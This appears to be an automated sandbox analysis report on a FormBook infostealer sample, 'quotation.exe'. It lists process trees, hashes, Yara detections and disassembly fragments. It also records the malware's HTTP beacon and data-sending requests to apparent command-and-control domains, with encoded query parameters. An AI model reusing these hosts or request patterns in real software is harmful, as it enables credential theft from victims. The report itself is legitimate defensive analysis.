                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:43.000658035 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:16:42 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=912vr480777402653404593; expires=Sun, 02-Dec-2029 13:16:42 GMT; Max-Age=157680000; path=/; domain=www.cortisalincontrol.net; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iAlpwvI6Iu379tXCzGJKconj+qZvNsg5UyDOBFjCBrVVVVL02szAVhpJqQKLGQ1A5iYIwTS2QEZFzexAvquzdA==
                                                                                Content-Length: 2645
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iAlpwvI6Iu379tXCzGJKconj+qZvNsg5UyDOBFjCBrVVVVL02szAVhpJqQKLGQ1A5iYIwTS
                                                                                Dec 3, 2024 14:16:43.000711918 CET | 1236 | IN |
                                                                                Data Ascii: 2QEZFzexAvquzdA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.cortisalincontrol.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.cortisalincontrol.net/px.js?c
                                                                                Dec 3, 2024 14:16:43.000720978 CET | 1169 | IN |
                                                                                Data Ascii: </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                41 | 192.168.2.5 | 50022 | 217.160.0.200 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:48.483681917 CET | 781 | OUT | POST /fqxx/ HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.carsten.studio
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:49.806359053 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:49 GMT
                                                                                Server: Apache
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                42 | 192.168.2.5 | 50023 | 217.160.0.200 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:51.149569035 CET | 801 | OUT | POST /fqxx/ HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.carsten.studio
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:52.462349892 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:52 GMT
                                                                                Server: Apache
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                43 | 192.168.2.5 | 50024 | 217.160.0.200 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:53.823158026 CET | 1818 | OUT | POST /fqxx/ HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.carsten.studio
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:55.182305098 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:54 GMT
                                                                                Server: Apache
                                                                                Content-Encoding: gzip


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                44 | 192.168.2.5 | 50025 | 217.160.0.200 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:16:56.528302908 CET | 522 | OUT | GET /fqxx/?PLpD=EQE6/f8JwKBVpYrNkw4Fqaku42g/bdfb0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK3z9ursJZ5jisJa4HYxh49r+T+FoVNmB7Fsft7Yvb0T4abVw==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:57.765364885 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Content-Length: 4545
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:57 GMT
                                                                                Server: Apache
                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                45 | 192.168.2.5 | 50026 | 154.70.82.246 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:17:05.028929949 CET | 796 | OUT | POST /lqxd/ HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                46 | 192.168.2.5 | 50027 | 154.70.82.246 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:17:07.700752974 CET | 816 | OUT | POST /lqxd/ HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                47 | 192.168.2.5 | 50028 | 154.70.82.246 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:17:10.391562939 CET | 1833 | OUT | POST /lqxd/ HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                48 | 192.168.2.5 | 50029 | 154.70.82.246 | 80 | 3680 | C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:17:13.049207926 CET | 527 | OUT | GET /lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Timestamp: Dec 3, 2024 14:17:16.246164083 CET, Bytes transferred: 482, Direction: IN, Data:
HTTP/1.1 301 Moved Permanently
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:17:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 0
                                                                                Connection: close
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEj



                                                                                Target ID:0
                                                                                Start time:08:13:09
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\quotation.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\quotation.exe"
                                                                                Imagebase:0xa00000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:FB56FBFA78C904B961A8DB42B7AC648D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:08:13:13
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\quotation.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\quotation.exe"
                                                                                Imagebase:0x630000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:FB56FBFA78C904B961A8DB42B7AC648D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:08:13:36
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe"
                                                                                Imagebase:0xb50000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:6
                                                                                Start time:08:13:37
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                                                Imagebase:0x3d0000
                                                                                File size:340'992 bytes
                                                                                MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:7
                                                                                Start time:08:13:50
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe"
                                                                                Imagebase:0xb50000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:08:14:02
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:8.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:10
                                                                                  Total number of Limit Nodes:2

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: O1i$uD c
                                                                                  • API String ID: 0-1293147713
                                                                                  • Opcode ID: 3de31484de9b1750f402bfe7135c13538230f2b797884329d99a7c95ef45646c
                                                                                  • Instruction ID: c0f984f9034c6f53a3db8351ee1247f3c3e1378b3eaacfc2c21e8ddaa0b048d8
                                                                                  • Opcode Fuzzy Hash: 3de31484de9b1750f402bfe7135c13538230f2b797884329d99a7c95ef45646c
                                                                                  • Instruction Fuzzy Hash: DA71F871604211CFD745CF28D59092ABBB5FB8130076699EADC82EF36AD730ED81CB56

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teeq$Teeq
                                                                                  • API String ID: 0-1240912287
                                                                                  • Opcode ID: 530a2dd9cbe665c548dcd0e275b34d374927391950c679597b608f701abfe6c9
                                                                                  • Instruction ID: 2602739387457f2f03cc193b5d4a96f6904c87d4214a5886b47e52f7cab2fa5d
                                                                                  • Opcode Fuzzy Hash: 530a2dd9cbe665c548dcd0e275b34d374927391950c679597b608f701abfe6c9
                                                                                  • Instruction Fuzzy Hash: 7851F4B1E142868FC705DFA884956AEBFF2FF95310F29449EC849AB362D7348D05CB91

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teeq$Teeq
                                                                                  • API String ID: 0-1240912287
                                                                                  • Opcode ID: 650638d7028d847bc061704e3557abccc63ad149a581d52a0de2089b7cc59016
                                                                                  • Instruction ID: 52dded13283ab5af96e8703b7f723d17e6c1cd39eea4d2ee100777b6bff12000
                                                                                  • Opcode Fuzzy Hash: 650638d7028d847bc061704e3557abccc63ad149a581d52a0de2089b7cc59016
                                                                                  • Instruction Fuzzy Hash: E1418170A101598FCB04DFA9C89467FBAB6FF88310F24806AD519FB3A5CB749D01CB91

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: O1i
                                                                                  • API String ID: 0-2683086037
                                                                                  • Opcode ID: 5e0136885e276db340d4b2486a62d29eebde58179ab1d02c34bd51a8c3dd9323
                                                                                  • Instruction ID: 88508ab8b8d6642485ce3fc403295bdf184bc894117ef74ae7142be69a04c69b
                                                                                  • Opcode Fuzzy Hash: 5e0136885e276db340d4b2486a62d29eebde58179ab1d02c34bd51a8c3dd9323
                                                                                  • Instruction Fuzzy Hash: 7C913472604141CFC7158F28C59496ABBB1FB81300BAB85DADC85AF357D730EA46CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 573 2bc8ddc-2bc8de2 574 2bc8deb-2bc8dee 573->574 575 2bc8de4-2bc8de6 573->575 576 2bc8def-2bc8ea9 CreateActCtxA 574->576 575->576 577 2bc8de8-2bc8de9 575->577 579 2bc8eab-2bc8eb1 576->579 580 2bc8eb2-2bc8f0c 576->580 577->574 579->580 587 2bc8f0e-2bc8f11 580->587 588 2bc8f1b-2bc8f1f 580->588 587->588 589 2bc8f30 588->589 590 2bc8f21-2bc8f2d 588->590 592 2bc8f31 589->592 590->589 592->592
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02BC8E99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: ~MPc
                                                                                  • API String ID: 2289755597-3169221526

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 593 2bc796c-2bc8ea9 CreateActCtxA 598 2bc8eab-2bc8eb1 593->598 599 2bc8eb2-2bc8f0c 593->599 598->599 606 2bc8f0e-2bc8f11 599->606 607 2bc8f1b-2bc8f1f 599->607 606->607 608 2bc8f30 607->608 609 2bc8f21-2bc8f2d 607->609 611 2bc8f31 608->611 609->608 611->611
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02BC8E99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: ~MPc
                                                                                  • API String ID: 2289755597-3169221526

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 612 2bce920-2bce960 613 2bce968-2bce993 GetModuleHandleW 612->613 614 2bce962-2bce965 612->614 615 2bce99c-2bce9b0 613->615 616 2bce995-2bce99b 613->616 614->613 616->615
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02BCE986
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID: ~MPc
                                                                                  • API String ID: 4139908857-3169221526
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .@$fk
                                                                                  • API String ID: 0-2595805726
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: I1T}
                                                                                  • API String ID: 0-311612125

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:4.8%
                                                                                  Signature Coverage:7.6%
                                                                                  Total number of Nodes:145
                                                                                  Total number of Limit Nodes:15

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 78 417c23-417c3f 79 417c47-417c4c 78->79 80 417c42 call 42f753 78->80 81 417c52-417c60 call 42fd53 79->81 82 417c4e-417c51 79->82 80->79 85 417c70-417c81 call 42e1f3 81->85 86 417c62-417c6d call 42fff3 81->86 91 417c83-417c97 LdrLoadDll 85->91 92 417c9a-417c9d 85->92 86->85 91->92
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
